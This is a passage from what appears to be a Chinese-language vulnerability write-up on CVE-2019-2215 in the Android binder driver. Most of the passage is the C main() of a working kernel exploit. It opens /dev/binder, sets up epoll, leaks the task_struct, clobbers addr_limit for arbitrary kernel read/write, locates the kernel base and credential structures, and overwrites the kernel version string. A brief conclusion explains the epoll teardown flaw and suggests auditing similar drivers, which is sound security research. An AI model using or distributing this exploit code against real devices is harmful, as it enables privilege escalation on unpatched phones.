  dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (dummy_page_4g_aligned != (void*)0x100000000UL)
    err(1, "mmap 4g aligned");
  if (pipe(kernel_rw_pipe)) err(1, "kernel_rw_pipe");

  binder_fd = open("/dev/binder", O_RDONLY);
  epfd = epoll_create(1000);
  leak_task_struct();
  clobber_addr_limit();

  setbuf(stdout, NULL);
  printf("should have stable kernel R/W now\n");

  /* in case you want to do stuff with the creds, to show that you can get them: */
  unsigned long current_mm = kernel_read_ulong(current_ptr + OFFSET__task_struct__mm);
  printf("current->mm == 0x%lx\n", current_mm);
  unsigned long current_user_ns = kernel_read_ulong(current_mm + OFFSET__mm_struct__user_ns);
  printf("current->mm->user_ns == 0x%lx\n", current_user_ns);
  unsigned long kernel_base = current_user_ns - SYMBOL__init_user_ns;
  printf("kernel base is 0x%lx\n", kernel_base);
  if (kernel_base & 0xfffUL) errx(1, "bad kernel base (not 0x...000)");
  unsigned long init_task = kernel_base + SYMBOL__init_task;
  printf("&init_task == 0x%lx\n", init_task);
  unsigned long init_task_cred = kernel_read_ulong(init_task + OFFSET__task_struct__cred);
  printf("init_task.cred == 0x%lx\n", init_task_cred);
  unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);
  printf("current->cred == 0x%lx\n", my_cred);

  unsigned long init_uts_ns = kernel_base + SYMBOL__init_uts_ns;
  char new_uts_version[] = "EXPLOITED KERNEL";
  kernel_write(init_uts_ns + OFFSET__uts_namespace__name__version, new_uts_version, sizeof(new_uts_version));
}

3. Conclusion

CVE-2019-2215的问题在于binder这类提供通过设备文件访问其功能的内核驱动没有处理好其销毁过程中和epoll联动部分(同步销毁其在epoll中可能存在的引用)。针对此类问题,可以尝试扩展到其他类似的驱动模块上进行代码审计,审计点在于check是否同样存在没有同步销毁其于epoll中的引用的问题。

4. Reference